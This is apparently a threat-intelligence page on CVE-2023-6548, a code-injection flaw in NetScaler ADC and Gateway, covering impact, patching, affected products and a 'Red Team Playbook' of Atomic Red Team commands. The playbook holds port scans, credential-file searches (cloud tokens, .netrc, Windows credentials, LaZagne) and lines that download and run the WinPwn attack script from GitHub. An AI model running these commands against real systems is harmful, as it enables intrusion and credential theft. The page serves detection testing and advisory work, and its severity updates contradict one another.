CVE-2023-6548
Overview
This vulnerability is a code injection flaw caused by improper control over code generation within the management interface of the NetScaler ADC and NetScaler Gateway. The root cause lies in insufficient validation of inputs accessible via NSIP, CLIP, or SNIP interfaces, which allows low-privileged authenticated users to inject and execute arbitrary code. The affected components are the management interfaces of NetScaler ADC and Gateway appliances, specifically those handling requests from network IPs with management access.
Vulnerability Description
Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway allows an attacker with access to NSIP, CLIP or SNIP with management interface to perform Authenticated (low privileged) remote code execution on Management Interface.
Impact
An attacker with low-privileged authenticated access to the management interface can execute arbitrary code remotely, potentially gaining control over the affected NetScaler ADC or Gateway device. This can lead to unauthorized command execution, data exposure, and full compromise of the management plane. The prerequisite is possession of credentials or access to an account with management interface privileges, which could be obtained through credential theft or insider threat. The business impact includes disruption of application delivery services and potential lateral movement within the network.
Solution
Citrix has released a security bulletin (CTX584986) addressing this vulnerability for NetScaler ADC and NetScaler Gateway. Administrators should apply the patches provided in this advisory promptly. The bulletin details fixed versions and recommended upgrade paths for affected NetScaler ADC and Gateway appliances, including FIPS and NDC++ variants. Refer to the Citrix support article at https://support.citrix.com/article/CTX584986 for detailed patching instructions and version-specific remediation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from an improper control of code generation, specifically a code injection flaw within the NetScaler ADC and NetScaler Gateway products. This vulnerability allows an attacker with access to the management interface—specifically through the NSIP, CLIP, or SNIP addresses—to execute arbitrary code remotely. Such access, even if limited to low-privileged accounts, can lead to significant security breaches, as it enables attackers to manipulate the system's behavior, potentially leading to unauthorized access, data exfiltration, or further exploitation of the network.
Attack vectors for this vulnerability are particularly concerning due to the potential for exploitation by individuals with minimal access rights. An attacker could leverage social engineering techniques or exploit weak password policies to gain authenticated access to the management interface. Once inside, the attacker could inject malicious code, which the system would execute with the privileges of the compromised account. This scenario underscores the importance of securing management interfaces and ensuring that only trusted personnel have access to sensitive administrative functions.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on NetScaler products for application delivery and secure remote access. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and significant financial losses. Additionally, the reputational damage resulting from a breach could have long-lasting effects on customer trust and business relationships. Organizations that fail to address this vulnerability may also face regulatory scrutiny and potential fines, especially if sensitive customer data is compromised.
To detect and mitigate this threat, organizations should implement a multi-layered security approach. Regular security assessments and vulnerability scanning can help identify potential weaknesses in the configuration of NetScaler products. Additionally, organizations should enforce strict access controls, ensuring that only authorized personnel can access management interfaces. Employing strong authentication mechanisms, such as multi-factor authentication, can further reduce the risk of unauthorized access. Furthermore, timely patch management is crucial; organizations should stay informed about security updates from Citrix and apply them promptly to mitigate known vulnerabilities.
In conclusion, the code injection vulnerability in NetScaler ADC and Gateway products poses a significant risk to organizations that utilize these technologies. The potential for remote code execution by low-privileged users highlights the need for robust security measures and vigilant monitoring. By implementing effective detection and mitigation strategies, organizations can protect themselves from the risks associated with this vulnerability and safeguard their critical assets against potential exploitation.
Following the recent revision of the CVSS score for CVE-2023-6548 from 8.8 to 5.5, CSURFACE threat intelligence notes a corresponding decrease in the EPSS score, reflecting a reduced likelihood of widespread exploitation. This adjustment aligns with the absence of new exploit developments or ransomware group associations in our telemetry, indicating a stabilization rather than escalation in the threat landscape. The lowered severity rating underscores a recalibration of risk, suggesting that while the vulnerability remains exploitable under specific conditions, its immediate threat to organizations using NetScaler ADC and Gateway products is less critical than initially assessed. Defenders should interpret this update as a signal that, although vigilance remains necessary, the urgency for emergency response or prioritization over higher-severity vulnerabilities may be moderated based on current exploitation trends.
Update 2 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-6548, indicating increased adversary interest and potential exploitation attempts targeting NetScaler ADC and Gateway management interfaces. This surge in telemetry correlates with the recent upward revision of the CVSS score to 8.8, reflecting a reassessment of the vulnerability’s impact and exploitability. The heightened severity underscores that attackers with low-privileged authenticated access can more readily execute remote code, elevating the risk profile for affected environments. Although no new exploit techniques or ransomware affiliations have been observed, the intensified detection trend signals that threat actors are actively probing or leveraging this flaw. Consequently, defenders should recognize this vulnerability as a more immediate and credible threat vector than previously assessed, warranting increased monitoring and prioritization within vulnerability management workflows.
Update 3 — July 16, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-6548, indicating increased adversary engagement with this vulnerability. While the overall exploit landscape remains unchanged with no new public exploit code or ransomware associations emerging, our telemetry reveals a clear uptick in attempts to leverage the improper code generation flaw within NetScaler ADC’s management interfaces. This surge suggests that threat actors are intensifying reconnaissance and exploitation efforts, potentially aiming to expand footholds in targeted environments through low-privileged authenticated access. The persistence and growth of these probing activities elevate the immediacy of the threat, underscoring a heightened risk of successful remote code execution attacks. Consequently, this development warrants a reassessment of the vulnerability’s operational impact, shifting it toward a more urgent risk profile that demands closer monitoring and prioritization in defensive postures.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6548 |
| support.citrix.com |
GitHub CVE
|
https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-6548 |